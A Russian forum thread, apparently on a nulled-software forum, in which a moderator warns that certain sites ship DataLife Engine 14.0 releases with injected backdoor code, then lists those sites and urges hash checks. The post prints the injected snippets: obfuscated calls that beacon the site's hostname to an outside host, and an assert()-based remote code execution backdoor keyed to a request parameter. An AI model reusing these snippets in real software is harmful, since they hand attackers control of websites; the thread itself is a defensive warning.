• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация Сайты, которые распространяют релизы DLE с левым вшитым кодом

killoff

CD тихо, и не DVD меня ;)
Команда форума
Модератор
Регистрация
13 Май 2008
Сообщения
2.619
Реакции
1.123
  • Автор темы
  • Модер.
  • #1
Недавно проверял одну сборку, в результате вместо чистого ДЛЕ там была версия со вшитым левым кодом в файлы ДЛЕ. И сразу же решил проверить из выдачи сайты, которые выкладывают такой левый оригинал ДЛЕ.
1590999716_2020-06-01_15-20-10.png

Далее приведены файлы и код, который они внедряют на примере версии ДЛЕ 14.0.

Добавляют файл engine\classes\min\lib\JSMinify.php с содержимым:


Проверил ДЛЕ от 13 версии выше - данного файла никогда нет и не было в оригинальных релизах DLE.
Так же этот файл прописан в доверенных в файле engine\classes\antivirus.class.php строкой:
Код:
"./engine/classes/min/lib/JSMinify.php",
[*]в файле engine\inc\addnews.php добавлен код:
Код:
    $serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false))
    {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."14."."0_".$serv;};
Код:
$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));
[*]В файле engine\modules\calendar.php добевлено:
Код:
$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];
Код:
$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';
Код:
 $setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}
[*]В engine\modules\feedback.php добавлено:
Код:
$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;
Код:
            $sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false))
            {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}

Возможно в других версиях DLE они правили помимо данных файлов и ещё какие-то... Но проверки одной версии хватает вполне, чтобы понять, что данный сайт распространяет заразу в своих релизах, при этом в наглую п*3*ят:
1590999905_2020-06-01_15-24-06.png
и все верят на слово, а потом жалуются что их сайт проседает в выдаче яндекса из-за обмана мобильных пользователей.

В общем обращение ко всем: не доверяйте левым сайтам, на форумах нуллед и зерокул я всегда выкладываю чистые версии (правда только через две недели после релиза финала), но актуальные хэш-суммы файлов выкладываю по мере возможности, чтобы если на каком то из сайтов выкладывают новую версию - любой пользователь мог сравнить файлы по хэш-сумме и понять, оригинал ли там выложен или нет, и на основе этого делать вывод - использовать скачанный релиз или ждать 100% оригинала DLE.

Решил пройтись по топ-20 выдачи яндекса по запросу "скачать DLE" и составить список всех сайтов, распространяющих "грязные" чистые оригиналы DLE. Проверять буду по последней актуальной версии DLE 14.0. Попозже укажу полный список из топ-20 выдачи.

Список сайтов, распространяющие грязные DLE:
newtemplates.ru
dlepavilion.com
dle-news.net
teroni.ru
vipadmin. club
На prowebber.ru выложен только нулл ДЛЕ и грязи никакой не обнаружено внутри архива, а так же версия без обновлений ДЛЕ, т.е. не последний релиз версии 14.0. На остальных сайтах либо нет новых релизов ДЛЕ, либо платный доступ, а версии раньше 14.0 я не проверял, т.к. нет смысла проверять сайты, на которых выложена, к примеру, последняя версия 12.0.
 
killoff, а по dle9 есть инфа? там чистый дистрибутив выложен или тоже с сюрпризами? Для просмотра ссылки Войди или Зарегистрируйся
Ато cеlsоft не светит хеши, не могу по быстрому проверить.
 
  • Автор темы
  • Модер.
  • #4
killoff, а по dle9 есть инфа? там чистый дистрибутив выложен или тоже с сюрпризами? Для просмотра ссылки Войди или Зарегистрируйся
Ато cеlsоft не светит хеши, не могу по быстрому проверить.
sorry за долгий ответ...

там на данный момент выложен оригинал, по хэшам если сравнить - сразу видно.
Ато cеlsоft не светит хеши, не могу по быстрому проверить.
я выкладываю хеши по мере возможности здесь на форуме.
 
Всем привет, основная часть сайтов по сути с "вшитым кодом", но тогда где брать? и скачивать более менее нормальные шаблоны?
 
  • Автор темы
  • Модер.
  • #6
Всем привет, основная часть сайтов по сути с "вшитым кодом", но тогда где брать? и скачивать более менее нормальные шаблоны?
Здесь на форуме к примеру. Шаблоны проверять всегда на левые ссылки или покупать их.
 
Здесь на форуме к примеру. Шаблоны проверять всегда на левые ссылки или покупать их.
Да, но только на форуме по ссылке https://nulled.ws/forums/88/?prefix_id=128
пишет это
У Вас недостаточно прав для просмотра этой страницы или для выполнения этого действия.
Нашел вроде как прикольный шаблон

LilBro для DLE 15.1​

Для просмотра ссылки Войди или ЗарегистрируйсяНо отзывы плохие, в одних сайтах по отзывам их обсирают, в другом других в итоге не понятно

Бесплатно тут
Для просмотра ссылки Войди или Зарегистрируйсятут 15.0
Для просмотра ссылки Войди или ЗарегистрируйсяНо опять про этот сайт написали выше, тип вшивает код
 
  • Автор темы
  • Модер.
  • #8
Да, но только на форуме по ссылке https://nulled.ws/forums/88/?prefix_id=128
пишет это
У Вас недостаточно прав для просмотра этой страницы или для выполнения этого действия.
всё норм перекидывает на ссылку https://nulled.ws/forums/Скины.88/?prefix_id=128 и там шаблоны для DLE.
 
всё норм перекидывает на ссылку https://nulled.ws/forums/Скины.88/?prefix_id=128 и там шаблоны для DLE.
Здравствуйте. У меня тоже выдает ошибку при переходе в скины:
"Упс! Мы столкнулись с некоторыми проблемами.
У Вас недостаточно прав для просмотра этой страницы или для выполнения этого действия."

Подскажите, в чем может быть проблема?
 
Скрытое содержимое доступно для зарегистрированных пользователей!
 
Назад
Сверху